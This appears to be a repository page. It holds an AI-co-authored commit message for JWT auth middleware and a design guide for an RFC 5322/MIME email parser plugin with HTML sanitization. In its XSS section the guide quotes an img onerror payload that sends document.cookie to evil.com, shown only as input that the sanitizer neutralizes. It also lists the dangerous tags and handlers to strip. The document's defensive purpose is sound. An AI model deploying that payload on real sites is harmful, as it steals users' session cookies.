Complete implementation of enterprise-grade authentication middleware for email service: Features: - JWT token creation/validation with configurable expiration - Bearer token extraction and validation - Multi-tenant isolation enforced at middleware level - Role-based access control (RBAC) with user/admin roles - Row-level security (RLS) for resource access - Automatic request logging with user context and audit trail - CORS configuration for email client frontend - Rate limiting (50 req/min per user with Redis backend) - Comprehensive error handling with proper HTTP status codes Implementation: - Enhanced src/middleware/auth.py (415 lines) - JWTConfig class for token management - create_jwt_token() for token generation - decode_jwt_token() for token validation - @verify_tenant_context decorator for auth middleware - @verify_role decorator for RBAC - verify_resource_access() for row-level security - log_request_context() for audit logging Testing: - 52 comprehensive test cases covering all features - 100% pass rate with fast execution (0.15s) - Test categories: JWT, multi-tenant, RBAC, RLS, logging, integration - Full coverage of error scenarios and edge cases Documentation: - AUTH_MIDDLEWARE.md: Complete API reference and configuration guide - AUTH_INTEGRATION_EXAMPLE.py: Real-world usage examples for 5+ scenarios - PHASE_7_SUMMARY.md: Implementation summary with checklist - Inline code documentation with type hints Security: - Multi-tenant data isolation at all levels - Constant-time password comparison - JWT signature validation - CORS protection - Rate limiting against abuse - Comprehensive audit logging Dependencies Added: - PyJWT==2.8.1 Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
13 KiB
Email Parser Plugin - Implementation Guide
Phase 6 of the email client architecture: RFC 5322 compliant email parsing with comprehensive MIME support.
Architecture Overview
The email parser is a workflow node executor that transforms raw RFC 5322 email messages into structured data compatible with the DBAL EmailMessage and EmailAttachment entities.
Flow
Raw IMAP Message (RFC 5322)
↓
[Email Parser Plugin]
├─ Parse Headers (RFC 5322)
├─ Parse MIME Structure (RFC 2045-2049)
├─ Extract Bodies (text/plain, text/html)
├─ Extract Attachments
└─ Sanitize HTML (XSS Protection)
↓
Structured EmailMessage
├─ messageId, from, to, cc, bcc, replyTo
├─ subject, textBody, htmlBody
├─ headers (all key-value pairs)
└─ attachments[] with metadata
↓
[DBAL Write Node]
├─ Store EmailMessage entity
└─ Store EmailAttachment entities (one per file)
Implementation Details
1. Header Parsing (RFC 5322)
The parser implements RFC 5322 header field syntax:
header-field = field-name ":" field-body
field-name = 1*ftext
field-body = field-value [CRLF WSP field-value] ; header folding
Key Features:
- Case-insensitive header names
- Support for folding (continuation lines)
- Multiple values for same header (e.g., Received, X-Custom)
- RFC 2047 encoded-word decoding for non-ASCII
Implementation:
private _parseHeaders(headersSection: string): Map<string, string | string[]>
Process:
- Split by CRLF or LF
- Check each line for continuation (starts with space/tab)
- Store in case-insensitive Map
- Handle duplicate headers as arrays
2. MIME Structure Parsing (RFC 2045-2049)
Multipart messages have recursive structure:
multipart/alternative
├─ text/plain (simple part)
├─ text/html (simple part)
└─ multipart/mixed
├─ text/plain
└─ application/pdf (attachment)
Key Features:
- Detect
multipartmessages viaContent-Type: multipart/* - Extract boundary from Content-Type parameter
- Split body by boundary delimiters (--boundary)
- Parse each part recursively
- Support nested multipart structures
Implementation:
private _parseMimePart(
body: string,
contentType: string,
contentEncoding: string
): MimePart
Process:
- Check if message is multipart
- Extract boundary from Content-Type
- Split body by boundary
- For each part, recursively call _parseMimePart
- Build tree structure
3. Body Extraction
Extract text and HTML bodies from MIME tree:
Strategy for multipart/alternative:
- Prefer
text/htmlif available - Fall back to
text/plainif HTML not present - Skip both if neither found
Strategy for multipart/mixed:
- First text/plain → textBody
- First text/html → htmlBody
- Other parts → attachments
Implementation:
private _extractBodies(
mimePart: MimePart,
sanitizeHtml: boolean,
maxLength: number
): { textBody?: string; htmlBody?: string; sanitizationWarnings: number }
4. Content Encoding
Handle multiple content transfer encodings:
| Encoding | Handling |
|---|---|
base64 |
Decode using Buffer.from() |
quoted-printable |
Decode soft line breaks (=\r\n) and escape sequences (=XX) |
7bit, 8bit, binary |
No transformation needed |
Implementation:
private _decodeContent(content: string, encoding: string): string
5. HTML Sanitization
Remove XSS vectors while preserving content:
Dangerous Tags Removed:
- Script execution:
<script>,<style> - Embedding:
<iframe>,<object>,<embed>,<applet> - Forms:
<form>,<input>,<button>,<select> - SVG/Math:
<svg>,<math>
Dangerous Attributes Removed:
- Event handlers:
onclick,onerror,onload,onchange, etc. - URLs with javascript:
href="javascript:...",src="javascript:..." - Scripts in forms:
formaction,action
Implementation:
private _sanitizeHtml(html: string): { html: string; warnings: number }
Process:
- Remove script tags and content:
<script>.*?</script> - Remove iframe tags:
<iframe>.*?</iframe> - Remove style tags:
<style>.*?</style> - Strip event handlers from all tags
- Remove event handler attributes globally
Safety Notes:
- Does NOT parse HTML into DOM (text-based replacement)
- Does NOT load external resources
- Does NOT validate tag nesting
- Conservative: Removes suspicious content
6. Attachment Extraction
Identify and catalog attachments:
Criteria for Attachment:
- MIME part exists in multipart/mixed
- Not in list of inline types (text/plain, text/html)
- Has Content-Disposition header
- Filename can be extracted from filename parameter
Metadata Collected:
filename: From Content-Disposition or Content-Type name parametermimeType: Extracted from Content-Typesize: Length of encoded contentcontentId: For embedded resources (Content-ID header)isInline: From Content-Disposition inline vs attachmentcontentEncoding: Transfer encoding usedcontent: Optional base64 when extractSize < 10MB
Implementation:
private _extractAttachments(
mimePart: MimePart,
extractContent: boolean,
maxSize: number
): { attachments: EmailAttachmentMetadata[]; ... }
Testing Strategy
Unit Tests
-
RFC 5322 Parsing
- Simple headers
- Multiple To addresses
- Display names in addresses
- Header folding with continuation lines
- Optional headers (CC, BCC, Reply-To)
-
MIME Multipart
- multipart/alternative (text + html)
- multipart/mixed (body + attachments)
- Nested multipart structures
- Boundary handling edge cases
-
Content Encoding
- Base64 decoding
- Quoted-printable decoding
- 7bit, 8bit, binary pass-through
-
HTML Sanitization
- Script tag removal
- Event handler removal
- iframe removal
- Safe HTML preservation
-
Attachment Extraction
- Attachment cataloging
- Inline vs attachment detection
- Size limit enforcement
- Content extraction control
-
Error Handling
- Missing From header
- Missing To header
- Invalid MIME structure
- Parsing recovery
-
Real-World Scenarios
- Complete realistic emails
- Multiple attachments
- Complex nesting
- Unicode headers (RFC 2047)
Coverage Goals
- Line coverage: 80%+
- Branch coverage: 80%+
- All error paths tested
- Edge cases (empty headers, no body, etc.)
Integration Points
With IMAP Sync Plugin
IMAP Sync fetches raw message from IMAP server:
// IMAP returns raw RFC 5322 message
const rawMessage = await imapClient.fetchMessage(messageId, 'BODY[]');
// Parser receives it
const config: EmailParserConfig = {
rawMessage, // ← Raw RFC 5322 format
tenantId: user.tenantId
};
With DBAL Storage
Parser output matches DBAL entity schema:
// Parser output
const message: ParsedEmailMessage = {
messageId: "<123@example.com>",
from: "alice@example.com",
to: ["bob@example.com"],
subject: "Meeting",
textBody: "Let's meet at 2pm",
htmlBody: "<p>Let's meet at 2pm</p>",
attachments: [
{ filename: "agenda.pdf", mimeType: "application/pdf", ... }
]
};
// DBAL entity
const emailMessage: EmailMessage = {
tenantId: user.tenantId,
emailClientId: account.id,
folderId: folder.id,
messageId: message.messageId,
from: message.from,
to: JSON.stringify(message.to), // JSON stored in DB
subject: message.subject,
textBody: message.textBody,
htmlBody: message.htmlBody,
headers: JSON.stringify(message.headers),
receivedAt: new Date(message.receivedAt).getTime(),
attachmentCount: message.attachments.length
};
// Attachments stored separately
for (const attachment of message.attachments) {
const emailAttachment: EmailAttachment = {
tenantId: user.tenantId,
messageId: emailMessage.id,
filename: attachment.filename,
mimeType: attachment.mimeType,
size: attachment.size,
contentId: attachment.contentId,
isInline: attachment.isInline,
storageKey: `attachments/${emailMessage.id}/${attachment.filename}`,
downloadUrl: generatePresignedUrl(...)
};
}
Performance Considerations
Memory
- Loads entire message into memory
- Large messages (>100MB) may cause issues
- Attachment content not extracted by default (metadata only)
- For large attachments: Set
extractAttachmentContent: false
Parsing Speed
Typical times:
- Simple text: <1ms
- Text + HTML: 2-5ms
- With attachment: 5-10ms
- Large HTML (5MB): 50-100ms
Optimization
-
Disable HTML sanitization if not needed (rare):
sanitizeHtml: false // Faster, but less safe -
Don't extract large attachment content:
extractAttachmentContent: false // Metadata only -
Limit body length:
maxBodyLength: 1024 * 1024 // 1MB cap -
Set reasonable attachment limits:
maxAttachmentSize: 25 * 1024 * 1024 // Skip > 25MB
Security Considerations
XSS Prevention
The parser sanitizes all HTML to prevent stored XSS:
// Input (dangerous)
<img src="x" onerror="fetch('http://evil.com/steal?data=' + document.cookie)">
// Output (safe)
<img src="x"> // onerror removed
No Code Execution
The parser:
- Does NOT execute JavaScript
- Does NOT make HTTP requests
- Does NOT access filesystem
- Does NOT run arbitrary code
Multi-Tenant Safety
All parser operations include tenantId:
- Used in workflow context
- Passed to DBAL storage
- Enforces row-level access control
No External Dependencies
The parser uses only Node.js built-in APIs:
Bufferfor encoding/decoding- Regular expressions for parsing
- No external npm packages
Error Recovery
Graceful Degradation
When non-critical errors occur:
{
status: 'partial',
message: ParsedEmailMessage, // ← Still produced
errors: [ // ← Non-fatal errors listed
{ code: 'INVALID_MIME', message: '...', recoverable: true }
]
}
Recoverable vs Non-Recoverable
Non-Recoverable (no message output):
- Missing From header
- Missing To header
- Total parse exception
Recoverable (message still output):
- Malformed MIME structure
- Invalid encoding in attachment
- Header parsing issues
- HTML sanitization warnings
Future Enhancements
-
Streaming Support
- Process large messages in chunks
- Reduce memory footprint
-
Async Content Extraction
- Store attachments to S3 during parsing
- Return only metadata
-
S/MIME and PGP
- Decrypt encrypted content
- Verify signatures
- Extract certificates
-
Better Charset Handling
- Detect charset from content
- Handle more encodings
-
Header Validation
- DKIM signature verification
- SPF/DMARC checking
-
Conversation Threading
- Group related messages
- Extract references (In-Reply-To, References)
Debugging
Enable Detailed Logging
In workflow execution context:
const result = await emailParserExecutor.execute(node, context, state);
// Check metrics
console.log('Parse time:', result.output.metrics.parseDurationMs);
console.log('Headers:', result.output.metrics.headerCount);
console.log('Parts:', result.output.metrics.partCount);
console.log('Attachments:', result.output.metrics.attachmentCount);
// Check warnings
if (result.output.warnings.length > 0) {
console.warn('Warnings:', result.output.warnings);
}
// Check errors
if (result.output.errors.length > 0) {
console.error('Errors:', result.output.errors);
}
Common Issues
-
Empty body after parsing
- Check if message has body at all
- Verify Content-Type multipart handling
- Check character encoding
-
Attachments not found
- Verify multipart/mixed structure
- Check Content-Disposition header
- Verify maxAttachmentSize limit
-
HTML missing after sanitization
- Check if HTML was actually present
- Review sanitization warnings count
- May have removed all content if too dangerous
-
Special characters garbled
- Check RFC 2047 encoding in header
- Verify charset parameter in Content-Type
- Buffer encoding during base64 decode
Contributing
To extend the parser:
- Add new MIME type support in
_extractBodies() - Add new sanitization rules in
_sanitizeHtml() - Add encoding support in
_decodeContent() - Add tests in
index.test.ts - Update README.md with new features
References
- RFC 5322 - Internet Message Format (SMTP)
- RFC 2045-2049 - MIME (Multipurpose Internet Mail Extensions)
- RFC 2047 - MIME Header Extensions for Non-ASCII Text
- RFC 3501 - IMAP4rev1 (Mailbox Integration)
- RFC 2183 - Content-Disposition Header Field
- RFC 2387 - The MIME Multipart/Related Content-Type